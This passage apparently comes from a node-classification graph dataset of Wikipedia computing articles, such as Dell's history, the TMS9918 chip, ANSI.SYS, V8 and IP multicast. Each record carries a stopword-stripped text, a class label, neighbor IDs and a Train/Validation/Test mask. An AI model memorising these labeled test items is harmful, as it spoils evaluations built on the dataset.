dell briefly sold products sears stores u.s 2007 dell started shipping products major retailers u.s. starting sam club wal-mart staples largest office-supply retailer u.s. best buy largest electronics retailer u.s. became dell retail partners later year starting 2002 dell opened kiosk locations united states allow customers examine products buying directly company starting 2005 dell expanded kiosk locations include shopping malls across australia canada singapore hong kong january 30 2008 dell announced would shut 140 kiosks u.s. due expansion retail stores june 3 2010 dell also shut mall kiosks australia dell products shipped one largest office-supply retailers canada staples business depot april 2008 future shop best buy began carrying subset dell products certain desktops laptops printers monitors since shoppers certain markets show reluctance purchase technological products phone internet dell looked opening retail operations countries central europe russia april 2007 dell opened retail store budapest october year dell opened retail store moscow uk hmv flagship trocadero store sold dell xps pcs since december 2007 january 2008 uk stores dsgi sold dell products particular currys pc world stores 2008 large supermarket-chain tesco sold dell laptops desktops outlets throughout uk may 2008 dell reached agreement office supply chain officeworks part coles group stock modified models inspiron desktop notebook range models slightly different model numbers almost replicate ones available dell store dell continued retail push australian market partnership harris technology another part coles group november year addition dell expanded retail distributions australia agreement discount electrical retailer good guys known slashing prices dell agreed distribute variety makes desktops notebooks including studio xps systems late 2008 dell dick smith electronics owned woolworths limited reached agreement expand within dick smith 400 stores throughout australia new zealand may 2009 1 year since officeworks—owned coles group—reached deal retailer agreed distribute variety inspiron studio notebooks minimal studio desktops dell range dell continues run operate various kiosks 18 shopping centres throughout australia march 31 2010 dell announced australian kiosk employees shutting australian/new zealand dell kiosk program germany dell selling selected smartphones notebooks via media markt saturn well shopping websites dell major competitors include hewlett-packard hp hasee acer fujitsu toshiba gateway sony asus lenovo ibm msi panasonic samsung apple dell subsidiary alienware compete enthusiast market avadirect falcon northwest voodoopc subsidiary hp manufacturers second quarter 2006 dell 18 19 share worldwide personal computer market compared hp roughly 15 dell lost lead pc-business hewlett-packard gartner idc estimated third quarter 2006 hp shipped units worldwide dell dell 3.6 growth paled comparison hp 15 growth period problem got worse fourth quarter gartner estimated dell pc shipments declined 8.9 versus hp 23.9 growth result end 2006 dell overall pc market-share stood 13.9 versus hp 17.4 idc reported dell lost server market share top four competitors arena idc q4 2006 estimates show dell share server market 8.1 9.5 previous year represents 8.8 loss year-over-year primarily competitors emc ibm 2001 dell emc entered partnership whereby companies jointly design products dell provided support certain emc products including midrange storage systems fibre channel iscsi storage area networks relationship also promotes sells oem versions backup recovery replication archiving software december 9 2008 dell emc announced multi-year extension 2013 strategic partnership emc addition dell expanded product lineup adding emc celerra nx4 storage system portfolio dell/emc family networked storage systems partnered new line data deduplication products part tierdisk family data storage devices october 17 2011 dell discontinued reselling emc storage products ending partnership 2 years early dell committed reducing greenhouse gas emissions global activities 40 2015 2008 fiscal year baseline year listed greenpeace ’ guide greener electronics scores leading electronics manufacturers according policies sustainability climate energy green products november 2011 dell ranked 2nd 15 listed electronics makers increasing score 5.1 4.9 gained previous ranking october 2010 dell first company publicly state timeline elimination toxic polyvinyl chloride pvc brominated flame retardants bfrs planned phase end 2009 revised commitment aims remove toxics end 2011 computing products march 2010 greenpeace activists protested dell offices bangalore amsterdam copenhagen calling dell ’ founder ceo michael dell ‘ drop toxics ’ claiming dell aspiration ‘ greenest technology company planet ’ ‘ hypocritical ’ dell launched first products completely free pvc bfrs g-series monitors g2210 g2410 2009 2012 report progress relating conflict minerals enough project rated dell eighth highest 24 consumer electronics companies dell became first company information technology industry establish product-recycling goal 2004 completed implementation global consumer recycling-program 2006 february 6 2007 national recycling coalition awarded dell recycling works award efforts promote producer responsibility july 19 2007 dell announced exceeded targets working achieve multi-year goal recovering 275 million pounds computer equipment 2009 company reported recovery 78 million pounds nearly 40,000 tons equipment customers 2006 93-percent increase 2005 12.4 equipment dell sold seven years earlier june 5 2007 dell set goal becoming greenest technology company earth long term company launched zero-carbon initiative includes company introduced term re-generation round table london commemorating 2007 world environment day re-generation refers people ages throughout world want make difference improving world environment dell also talked plans take lead setting environmental standard technology industry maintaining leadership future dell reports environmental performance annual corporate social responsibility csr report follows global reporting initiative gri protocol dell 2008 csr report ranked application level b checked gri company aims reduce external environmental impact energy-efficient evolution products also reduce direct operational impact energy-efficiency programs internal energy-efficiency programs reportedly save company 3 million annually energy-cost savings largest component company internal energy-efficiency savings comes pc power management company expects save 1.8 million energy costs using specialized energy-management software network 50,000 pcs 1990s dell switched using primarily atx motherboards psu using boards power supplies mechanically identical differently wired connectors meant customers wishing upgrade hardware would replace parts scarce dell-compatible parts instead commonly available parts motherboard power connections reverted industry standard 2003 dell remains secretive motherboard pin-outs peripherals mmc readers power on/off switches leds 2005 complaints dell doubled 1,533 earnings grew 52 year 2006 dell acknowledged problems customer service issues included call transfers 45 calls long wait times dell blog detailed response 're spending 100 million—and lot blood sweat tears talented people—to fix later year company increased spending customer service 150 million since 2018 dell seen significant increase consumer satisfaction moreover customer service praised prompt accurate answers questions especially directed social media support august 17 2007 dell inc. announced internal investigation accounting practices would restate reduce earnings 2003 first quarter 2007 total amount 50 million 150 million 2 cents 7 cents per share investigation begun november 2006 resulted concerns raised u.s. securities exchange commission documents information dell inc. submitted alleged dell disclosed large exclusivity payments received intel agreeing buy processors rival manufacturer amd 2010 dell finally paid 100 million settle sec charges fraud michael dell executives also paid penalties suffered sanctions without admitting denying charges july 2009 dell apologized drawing ire taiwanese consumer protection commission twice refusing honour flood orders unusually low prices offered taiwanese website first instance dell offered 19 lcd panel 15 second instance dell offered latitude e4300 notebook nt 18,558 us 580 70 lower usual price nt 60,900 us 1900 concerning e4300 rather honour discount taking significant loss firm withdrew orders offered voucher nt 20,000 us 625 customer compensation consumer rights authorities taiwan fined dell nt 1 million us 31250 customer rights infringements many consumers sued firm unfair compensation court southern taiwan ordered firm deliver 18 laptops 76 flat-panel monitors 31 consumers nt 490,000 us 15,120 less third normal price court said event could hardly regarded mistakes prestigious firm said company mispriced products twice taiwanese website within 3 weeks michael dell made 24.4 billion buyout bid august 2013 activist shareholder carl icahn sued company board attempt derail bid promote forthcoming offer",
    "neighbors": [
      9218,
      11270,
      1032,
      6153,
      1037,
      3605,
      8726,
      1560,
      8730,
      539,
      10780,
      10273,
      5681,
      54,
      5689,
      1083,
      10303,
      5185,
      11333,
      8792,
      3162,
      8794,
      10337,
      4194,
      1637,
      1638,
      2154,
      10350,
      1141,
      119,
      10360,
      8315,
      9341,
      7806,
      3711,
      9344,
      11391,
      8327,
      9863,
      7820,
      10382,
      7824,
      10393,
      4259,
      4771,
      8355,
      9894,
      3760,
      10417,
      6834,
      2230,
      7863,
      4282,
      196,
      6343,
      4816,
      2259,
      5338,
      225,
      1761,
      5349,
      3304,
      9449,
      9452,
      9455,
      9970,
      5368,
      3323,
      3328,
      5377,
      7937,
      5384,
      7432,
      271,
      8466,
      4890,
      9498,
      11546,
      4382,
      7970,
      292,
      1832,
      2862,
      823,
      4408,
      7996,
      6462,
      8515,
      10051,
      11082,
      6993,
      10067,
      11605,
      8022,
      4954,
      2395,
      4444,
      6495,
      9057,
      9059,
      4964,
      10090,
      1387,
      3951,
      4463,
      11631,
      4979,
      3445,
      10615,
      3966,
      11146,
      6539,
      5523,
      2965,
      10646,
      11157,
      411,
      7068,
      10658,
      5028,
      935,
      424,
      3495,
      6575,
      7089,
      9137,
      2995,
      3009,
      9665,
      11203,
      2500,
      1480,
      5073,
      7637,
      7126,
      2007,
      7638,
      998,
      6632,
      4073,
      1515,
      7151,
      6129,
      510
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1401,
    "label": 9,
    "text": "SIP_(software):sip software sip open source software tool used connect computer programs libraries written c c++ scripting language python alternative swig sip originally developed 1998 pyqt — python bindings qt gui toolkit — suitable generating bindings c c++ library sip takes set specification .sip files describing api generates required c++ code compiled produce python extension modules .sip file basically class header file things removed sip n't include full c++ parser things added c++ n't always provide enough information api works",
    "neighbors": [
      8554,
      2481,
      2804,
      9780,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1402,
    "label": 3,
    "text": "Cycles_per_instruction:cycles per instruction computer architecture cycles per instruction aka clock cycles per instruction clocks per instruction cpi one aspect processor performance average number clock cycles per instruction program program fragment multiplicative inverse instructions per cycle average cycles per instruction given process defined following formula_1 formula_2 number instructions given instruction type formula_3 formula_4 clock-cycles instruction type formula_5 total instruction count summation sums instruction types given benchmarking process let us assume classic risc pipeline following five stages stage requires one clock cycle instruction passes stages sequentially without pipelining new instruction fetched stage 1 previous instruction finishes stage 5 therefore number clock cycles takes execute instruction five cpi 5 1 case processor said subscalar pipelining new instruction fetched every clock cycle exploiting instruction-level parallelism therefore since one could theoretically five instructions five pipeline stages one instruction per stage different instruction would complete stage 5 every clock cycle average number clock cycles takes execute instruction 1 cpi 1 case processor said scalar single-execution-unit processor best cpi attainable 1 however multiple-execution-unit processor one may achieve even better cpi values cpi 1 case processor said superscalar get better cpi values without pipelining number execution units must greater number stages example six executions units six new instructions fetched stage 1 six previous instructions finish stage 5 therefore average number clock cycles takes execute instruction 5/6 cpi 5/6 1 get better cpi values pipelining must least two execution units example two executions units two new instructions fetched every clock cycle exploiting instruction-level parallelism therefore two different instructions would complete stage 5 every clock cycle average number clock cycles takes execute instruction 1/2 cpi 1/2 1 multi-cycle mips five types instructions program cpi formula_6 433mhz processor used execute benchmark program following instruction mix clock cycle count determine effective cpi mips millions instructions per second rate execution time program formula_7 formula_8 since formula_9 formula_10 formula_11 therefore formula_12",
    "neighbors": [
      7173,
      9739,
      2066,
      7187,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1403,
    "label": 3,
    "text": "Texas_Instruments_TMS9918:texas instruments tms9918 tms9918 video display controller vdc manufactured texas instruments introduced 1979 tms9918 variants used colecovision creativision memotech mtx msx sg-1000/sc-3000 spectravideo sord m5 tatung einstein texas instruments ti-99/4 casio pv-2000 tomy tutor tms9918 supports generation grid-based character graphics used display text background images sprites used moving foreground objects several variants called tms9918 tms9918a tms9928a tms9929a indicates second version chip added new features prominently addition bitmap mode graphic ii non-a version used ti-99/4 ti-99/4a computers version vdc tms9918a tms9928a output 60 hz video signal tms9929a outputs 50 hz difference 1 2 'tms9918a 'tms9928a 1 version outputs composite ntsc video 2 versions including tms9929a outputs ypbpr precisely r-y b-y colour differences luminance colour difference signals need latter predominant 50 hz world including europe due different video signal standards pal secam cost-effective output r-y b-y encode pal secam rf modulator try different console every different color standard 1 version also features external composite video input made handy chip use video titlers could overlay text graphics video 2 version later variant tms9918 series chips tms9118 tms9128 tms9129 released mid-late 1980s never popular function one pin changed different mapping 16k × 8 bit block video memory supported otherwise chips completely identical tms9918a tms9928a tms9929a respectively ics family usually referred tms9918 name sometimes postfix vdc 16k × 8 bits external video memory memory outside address space cpu separate address space means cpu work write read memory also means vdc n't slow cpu periodically reads memory generate display additionally leaves address space available cpu memory memory-mapped hardware depending screen mode used video memory may needed generate display cases cpu may use extra video memory purposes example one use scratch-pad uncompressing graphics sound data stored cartridge rom another popular use create second copy display data eliminate flickering tearing technique known double buffering cpu communicates vdc 8-bit bus pin controlled cpu separates bus two ports control port data port write read byte video memory cpu first write two bytes vdc control port vdc internal address register next cpu performs actual write read vdc data port data byte written read tms9918 automatically increments internal address register auto-increment feature accelerates writes reads blocks data control port also used access various internal registers tms9918 two separate distinct graphics types characters sprites characters typically used create text background images appear behind sprites tms9918 number screen modes control characteristics characters four documented screen modes available tms9918a mentioned tms9918 lacks mode graphic 2 texas instruments originally documented four modes listed however bit enables mode 2 interesting initially let best described modifier bit modes enabling three things mind three additional modes possible note although genuine tms9918a chips support modes clones emulators may technically mode 2 character mode colorful character set screen horizontally divided three 256×64 pixel areas gets character set sequentially printing characters 0 255 three areas program simulate graphics mode pixel set individually however resulting framebuffer non-linear program also use three identical character sets deal screen like text mode colorful character set background patterns sprites consist colorful characters commonly used games 32x24 bytes would moved fill scroll entire screen graphics drawn 8×8 pixel borders obvious art konami particularly well known excellence challenge using tms9918 mode 2 every 8×1 pixel area could two colors foreground background could freely picked 16 color palette 8x1 area two colors could exist manipulating screen basic line command one easily could exceed maximum 2 colors per 8×1 area end color spill tms9918 scroll registers scrolling must done software furthermore scrolling done characters boundaries sprites typically used create moving foreground objects appear front characters tiles modes 1 2 3 render sprites 32 monochrome sprites either 8×8 16×16 pixels screen sprite single color illusion multicolor sprites created stacking multiple sprites top 4 sprites single scanline additional sprites horizontal pixels dropped sprites higher priority drawn first vdp reports status register number first dropped sprite cpu get around limitation rotating sprite priorities different set sprites drawn every frame instead disappearing entirely sprites flicker technique known sprite multiplexing automatic sprite movement handled vdc instead practice cpu pick vdc 'vertical interrupt standard vdc output triggered automatically every 50th 60th second depending chip variant start vbi vertical blanking interval cpu jumps sprite-handling routine software turn tells vdc reposition sprites two non-transparent pixels pair sprites collide sprite collision flag set useful triggering advanced collision detection routines inside software determine exact location collision act upon vdc incapable reporting two sprites collided tms9918 fixed 16-color palette composed 15 displayed colors transparent color texas instruments tms9918a succeeded yamaha v9938 added additional bitmap modes colorful sprites vertical full-screen scroll register vertical horizontal offset registers hardware blitter customizable palette v9938 designed msx2 standard computers later used third-party upgrade ti-99/4a — geneve 9640 'computer-on-a-card v9938 turn succeeded v9958 added additional high-colour modes horizontal two-page scroll register chips used msx2+/turbor systems well tim upgrade card ti-99/4a although rumor v9958 also used generation photo play arcades yamaha also produced v9990 considered follow-up v9958 backwards compatible toshiba made clone called t6950 support undocumented pattern colour table masking feature graphics 2 mode later toshiba released t7937a msx-engine built-in vdp fixed masking features vdps toshiba feature slightly different palette texas vdps vivid colors tms9918 basis vdp chips sega master system game gear mega drive used additional display modes registers added hardware scrolling capabilities advanced features",
    "neighbors": [
      2209,
      7041,
      11462,
      7591,
      5128,
      1194,
      3406,
      9006,
      1776,
      7536,
      9998,
      4666,
      9947,
      11261
    ],
    "mask": "Test"
  },
  {
    "node_id": 1404,
    "label": 4,
    "text": "Computer_Law_&_Security_Review:computer law amp security review computer law security review journal accessible wide range professional legal practitioners businesses academics researchers libraries organisations public private sectors computer law security review regularly covers journal correspondent panel includes 40 specialists law security issue contains articles case law analysis current news information communications technology special features",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1405,
    "label": 3,
    "text": "DTACK_Grounded:dtack grounded dtack grounded computer hobbyist newsletter published july 1981 september 1985 hal w. hardenberg subtitled journal simple 68000 systems newsletter dedicated proposition motorola 68000 cpu could used build simple fast computers 1981 revolutionary idea 68000-based personal computers like apple macintosh commodore amiga atari st created 1981 motorola marketing 68000 solely cpu high-end unix workstations hal believed 68000 could used simple embedded microprocessor well used newsletter explain hal editor newsletter wrote almost content ostensible purpose newsletter promote hal company line 68000-based hardware software however hal never let get way telling good story explaining design build fast computer hardware engineer businessman also knew write software newsletter full amusing educational stories way personal computer hardware business worked strong opinions best way design personal computer hardware software dtack name pin motorola 68000 cpu informed cpu data ready read memory stands data transfer acknowledge system fast enough memory pin connected directly ground plane grounded produce fastest-possible memory read/write time however complex system would almost certainly several different types devices ram rom various peripherals would support different speeds access large system would normally accommodated using dtack line insert wait states —delays—into bus cycles 68000 separate i/o address space i/o devices must memory-mapped logic circuitry required pulse dtack high add delays could fairly complex therefore typically relatively simple systems use design dtack grounded i.e dtack always asserted many different peripherals different maximum speed capabilities must used small system another solution keep dtack grounded slow clock rate cpu memory peripheral devices transfer data reduced maximum speed cpu turn using lower cpu clock frequency enables simpler less expensive circuit board design fewer layers used successfully like limiting system peripherals low diversity design strategy typically applied small embedded systems would appropriate high-performance workstations many microprocessors including intel 8086 8088 80286 80386 8080 8085 zilog z80 6502 family input pin serves similar function dtack usually named ready rdy z80 named wait therefore reference dtack distinctively implies 68000 family cpus order discourage photocopying newsletter portion dtack grounded newsletter printed dark red paper made harder photocopy pages section newsletter called redlands typically contained assembly source code high performance math subroutines major topic later years newsletter dbasic interpreter hal produced fast basic interpreter atari st computer written hand-tuned assembly language ran fast compared basics non-standard could n't run microsoft basic programs could n't read write ms-dos format floppy disks unfortunately result popular 1990s hal revived dtack grounded occasional column dr. dobb journal called dtack revisited",
    "neighbors": [
      7281,
      7269,
      9166,
      5071
    ],
    "mask": "Test"
  },
  {
    "node_id": 1406,
    "label": 2,
    "text": "Linux_Terminal_Server_Project:linux terminal server project linux terminal server project ltsp free open source terminal server linux allows many people simultaneously use computer applications run server terminal known thin client also known x terminal handling input output generally terminals low-powered lack hard disk quieter reliable desktop computers moving parts technology becoming popular schools allows school provide pupils access computers without purchasing upgrading expensive desktop machines improving access computers becomes less costly thin client machines older computers longer suitable running full desktop os even relatively slow cpu little 128 mb ram deliver excellent performance thin client addition use centralized computing resources means performance gained less money upgrades single server rather across fleet computers converting existing computers thin clients educational institution also gain control students using computing resources user sessions monitored server see epoptes lab management tool current form v5.x ltsp relies distributions integrate ltsp architecture respective products v4.x series ltsp add-on package distribution several distributions integrate ltsp either mainline ubuntu debian separate product edubuntu ubuntu k12ltsp centos skolelinux debian kiwi-ltsp suse ltsp registered trademark disklessworkstations.com llc founder project leader ltsp jim mcquillan ltsp distributed terms gnu general public license initially mille-xterm project funded canadian public agencies school districts province quebec created version ltsp integrating four subprojects portal based uportal open-source middleware stack cd free software windows/mac finally mille-xterm mille-xterm project goal provide scalable infrastructure massive x-terminal deployment mille means modèle d'infrastructure logiciel libre en éducation free software infrastructure model education targeted educational institutions 2009 mille-xterm integrated back ltsp ltsp-cluster project specializing large scale deployment ltsp one main differences ltsp ltsp-cluster integration web-based central control center replaces traditional one configuration file per thin client method client customization ltsp lts.conf file main ltsp ltsp-cluster allows organizations centrally manage thousands thin clients parameters central location ltsp-cluster high-availability high-performance thin-clients specified optional use redundant components services load-balanced made highly available ltsp-cluster support linux application servers well windows application servers provides similar level support centralized management high-availability load-balancing features platforms also included support virtual desktops remote users using nx technology nx protocol allow remote windows linux sessions accessed web browser low bandwidth 40 kbit/s requirements tolerance high-latency connections nx client runs various operating systems including linux mac windows ltsp v5.x added support thin client type known fat clients advent inexpensive relatively powerful computer hardware idea run applications locally thin client offering manageability thin client solution became reality case ltsp fat client root filesystem rudimentary chroot full linux installation chroot fat client uses ldm authenticate ltsp server mounts user home directories using ssh fuse local cpu ram used fat clients provides benefits ltsp unique offering ability computer mount root filesystem network run applications locally windows platform closest equivalent solution use technology like intel vpro run client-side hypervisor mount root filesystem image using iscsi",
    "neighbors": [
      4616,
      3082,
      8214,
      10780,
      543,
      10785,
      3618,
      6180,
      8242,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      10341,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      4235,
      9868,
      7821,
      4238,
      10382,
      3729,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10926,
      10933,
      10422,
      7863,
      5822,
      5824,
      1736,
      2762,
      6352,
      9438,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      8439,
      2809,
      2811,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      295,
      7983,
      11568,
      823,
      6968,
      7992,
      318,
      11075,
      3911,
      6988,
      10063,
      11095,
      10091,
      8573,
      8066,
      7555,
      900,
      1416,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      8177,
      2036,
      5620,
      8186,
      2044,
      2559
    ],
    "mask": "Test"
  },
  {
    "node_id": 1407,
    "label": 2,
    "text": "Microsoft_Interface_Definition_Language:microsoft interface definition language microsoft interface definition language midl text-based interface description language microsoft based dce/rpc idl extends use microsoft component object model compiler also called midl",
    "neighbors": [
      10465,
      8262,
      6797,
      2644,
      214,
      8473,
      9596
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1408,
    "label": 2,
    "text": "ANSI.SYS:ansi.sys ansi.sys device driver dos family operating systems provides extra console functions ansi escape sequences partially based upon subset text terminal control standard proposed ansi x3l2 technical committee codes character sets x3 committee installed default notoriously slow little software took advantage instead resorted directly manipulating ibm pc hardware number third-party alternatives ran reasonable speed created attempt change however end fact software directly manipulated hardware caused display technology quite stagnant windows used device driver became popular use dos line added windows nt based versions windows file reads drive path drive letter path directory file found options number optional switches control behaviour may also loaded upper memory via loaded enables code sequences apply various text formatting features using driver programs write standard output make use 16 text foreground colors 8 background colors available vga-compatible text mode make text blink change location cursor screen blank screen also allows changing video mode standard 80×25 text mode number different graphics modes example 320×200 640×40-column text mode depending video graphics card installed standard relatively slow maps escape sequences equivalent bios calls several companies made third-party replacements interface directly video memory similar way dos programs full-screen user interface default internal dos command works directly calling corresponding bios function clear screen thereby prominently violating hardware abstraction model otherwise maintained however ansi driver detected dr-dos instead send control sequence defined reserved environment variable attached console device environment variable undefined falls back send sequence codice_2 instead specifying sequences used control various screen settings due difficulties define environment variables containing binary data command.com also accepts special notation octal numbers example send alternative control sequence like codice_3 used ascii terminals one could define variable follows features supported versions dos plus dr-dos ms-dos pc dos also supported command interpreters concurrent dos multiuser dos real/32 although use vt52 rather ansi control sequences default e.g codice_5 interesting feature ability remap key keyboard order perform shortcuts macros complex instructions using special escape sequences user define keystroke character-code mapping simulate arbitrary sequence keystrokes feature also used evildoers create simple trojans text files laced nefarious keyboard remaps known ansi bombs number products released protect users appeared ms-dos 2.0 first version operating system supporting device drivers supported following versions ms-dos also present many non-microsoft dos systems e.g ibm pc dos dr-dos version windows support ansi escape codes useful way could used msdos emulation versions windows 10 support similar escape sequences built win32 console text terminal window must activated using windows api function 'setconsolemode setting 'enable_virtual_terminal_processing flag csi control sequence introducer placeholder common two-byte escape lead-in sequence nowiki esc /nowiki ansi standard also defines alternative single-byte csi code supported ansi.sys standard dos drivers support following sub-set ansi escape sequences also escape sequences specific implementation generally supported ansi consoles operating systems dos implementations video modes 7 documented multiuser dos valid argument conjunction pcterm 7",
    "neighbors": [
      3841,
      6148,
      10756,
      8713,
      2201,
      10273,
      292,
      2213,
      7847,
      3496,
      6570,
      7983,
      178,
      7099,
      6213,
      9166,
      1237,
      2786,
      1515,
      8301,
      3314,
      4727,
      5754
    ],
    "mask": "None"
  },
  {
    "node_id": 1409,
    "label": 9,
    "text": "V8_(JavaScript_engine):v8 javascript engine v8 open-source javascript engine developed chromium project google chrome chromium web browsers project ’ creator lars bak first version v8 engine released time first version chrome september 2 2008 also used couchbase mongodb node.js used server-side v8 compiles javascript directly native machine code executing instead traditional techniques interpreting bytecode compiling whole program machine code executing filesystem compiled code additionally optimized re-optimized dynamically runtime based heuristics code execution profile optimization techniques used include inlining elision expensive runtime properties inline caching garbage collector generational incremental collector v8 compile x86 arm mips instruction set architectures 32- 64-bit editions well ported powerpc ibm s390 use servers v8 assembler based strongtalk assembler 7 december 2010 new compiling infrastructure named crankshaft released speed improvements since version 41 chrome 2015 project turbofan added enable speed e.g asm.js 2016 ignition interpreter added v8 design goal reducing memory usage small memory android phones comparison turbofan crankshaft 2017 v8 shipped brand-new compiler pipeline consisting ignition interpreter turbofan optimizing compiler starting v8 version 5.9 full-codegen crankshaft longer used v8 javascript execution since team believes longer able keep pace new javascript language features optimizations features require v8 used browser integrated independent projects v8 used following software",
    "neighbors": [
      8719,
      4112,
      7700,
      31,
      5154,
      10284,
      7234,
      4171,
      4683,
      5707,
      11343,
      3664,
      84,
      603,
      2658,
      5219,
      8821,
      6791,
      7816,
      5262,
      8854,
      8858,
      3761,
      1203,
      5311,
      7359,
      7871,
      196,
      3269,
      3782,
      5835,
      7885,
      3795,
      4822,
      1240,
      9432,
      8413,
      6367,
      7396,
      4326,
      236,
      5356,
      5358,
      9964,
      10991,
      9970,
      2808,
      3836,
      7421,
      2304,
      259,
      5380,
      5892,
      10507,
      4378,
      10013,
      10525,
      7455,
      803,
      4901,
      7462,
      814,
      11060,
      5431,
      2880,
      11590,
      6477,
      11087,
      3409,
      339,
      3413,
      9560,
      8037,
      5483,
      10097,
      3971,
      4995,
      8068,
      3462,
      8584,
      5522,
      5524,
      10645,
      1435,
      8605,
      1952,
      8609,
      2978,
      1959,
      3499,
      438,
      9152,
      10703,
      4048,
      4056,
      477,
      482,
      487,
      6632,
      9195,
      9712,
      9714,
      8700,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 1410,
    "label": 5,
    "text": "AlternC:alternc alternc set open-source web hosting server management software linux/unix-like systems whose aim promote self hosting individuals small structures provide users easy web-based interface manage web mail server internet-based services main specificity provide users non-technical web interface anybody without specific knowledge host web services also advanced options technical-savvy users still fine-tune also features documentation french english 2000 french free hosting provider altern.org stopped service complaint trial estelle hallyday effectively cutting 47634 websites later valentin lacambre gave hosting control panel free software hoping people take independent big hosting structures favor free speech alternative hosting may 2001 valentin source code abandoned rewrite started technical team l ’ autre net non-profit hosting provider organized self-managed association gave birth alternc wanted follow guidelines valentin panel mostly usability design today non-profit hosting providers using developing software suite lautre net founder project also globenet structures belgium québec africa professional web hosting companies also using alternc participate actively code octopuce neuronnexion webelys poll 2010 estimated least 110 servers running alternc total 3500 accounts hosting 9500 domain names 25000 pop/imap email accounts 2200 domain names around thousand users l ’ autre net poll counting people actively helping project project still actively developed long series 0.9.prexx 0.9.x versions version 1.0 published june 2011 new web interface design current usable paperback book french also published time effectively making 2011 milestone software history next version released february 2013 version 3.0 mainly plugins different version numbers development team wanted make coherent main software version mailman plugin version 2.1 already many new features bugfixes present version notable one migration courier dovecot email service separation security reasons web hosted services using distincts unix user accounts thanks itk module apache http server latest versions alternc 3.1.10 squeeze 3.2.10 wheezy 3.3.10 jessie released january 18 2016 3.1.9 squeeze 3.2.9 wheezy released november 17 2015 3.1.8 squeeze 3.2.8 wheezy released august 3 2015 alternc based debian gnu/linux using standard debian packages therefore used level security debian standard configuration tools allows system administrator manage server alternc services machine",
    "neighbors": [
      225,
      865,
      8865,
      7078,
      2887,
      2504,
      7983,
      1650,
      5492,
      8310,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1411,
    "label": 5,
    "text": "IP_multicast:ip multicast ip multicast method sending internet protocol ip datagrams group interested receivers single transmission ip-specific form multicast used streaming media network applications uses specially reserved multicast address blocks ipv4 ipv6 protocols associated ip multicast include internet group management protocol protocol independent multicast multicast vlan registration igmp snooping used manage ip multicast traffic layer-2 networks ip multicast described ip multicast first standardized 1986 specifications augmented rfc 4604 include group management include administratively scoped addresses ip multicast technique one-to-many many-to-many real-time communication ip infrastructure network scales larger receiver population requiring neither prior knowledge receiver identity prior knowledge number receivers multicast uses network infrastructure efficiently requiring source send packet even needs delivered large number receivers nodes network typically network switches routers take care replicating packet reach multiple receivers messages sent link network common transport layer protocol use multicast addressing user datagram protocol udp nature udp reliable—messages may lost delivered order reliable multicast protocols pragmatic general multicast pgm developed add loss detection retransmission top ip multicast key concepts ip multicast include ip multicast group address multicast distribution tree receiver driven tree creation ip multicast group address used sources receivers send receive multicast messages sources use group address ip destination address data packets receivers use group address inform network interested receiving packets sent group example content associated group 239.1.1.1 source send data packets destined 239.1.1.1 receivers content inform network interested receiving data packets sent group 239.1.1.1 receiver joins 239.1.1.1 protocol typically used receivers join group called internet group management protocol igmp routing protocols based shared trees receivers join particular ip multicast group multicast distribution tree constructed group protocol widely used protocol independent multicast pim sets multicast distribution trees data packets senders multicast group reach receivers joined group variations pim implementations sparse mode sm dense mode dm source specific mode ssm bidirectional mode bidir sparse-dense mode sdm pim-sm widely deployed ssm bidir simpler scalable variations developed recently gaining popularity ip multicast operation require active source know receivers group multicast tree construction receiver driven initiated network nodes close receivers ip multicast scales large receiver population ip multicast model described internet architect dave clark put packets one end network conspires deliver anyone asks ip multicast creates state information per multicast distribution tree network router part 1000 multicast trees 1000 multicast routing forwarding entries hand multicast router need know reach multicast trees internet needs know multicast trees downstream receivers key scaling multicast-addressed services contrast unicast router needs know reach unicast addresses internet even using default route reason aggregation key scaling unicast routing also core routers carry routes hundreds thousands contain internet routing table host fact application host wants receiving member multicast group i.e receive data corresponding particular multicast address must use internet group management protocol igmp join adjacent routers also use protocol communicate unicast routing router examines destination address incoming packet looks destination table determine interface use order packet get closer destination source address irrelevant router however multicast routing source address simple unicast address used determine data stream direction source multicast traffic considered upstream router determines downstream interfaces destinations multicast group destination address sends packet appropriate interfaces term reverse path forwarding used describe concept routing packets away source rather towards destination number errors happen packets intended unicast accidentally sent multicast address particular sending icmp packets multicast address used context dos attacks way achieving packet amplification local network multicast delivery controlled igmp ipv4 network mld ipv6 network inside routing domain pim mospf used routing domains one uses inter-domain multicast routing protocols mbgp following common delivery routing protocols used multicast distribution unicast packets delivered specific recipient ethernet ieee 802.3 subnet setting specific layer 2 mac address ethernet packet address broadcast packets make use broadcast mac address ff ff ff ff ff ff ipv4 multicast packets delivered using ethernet mac address range 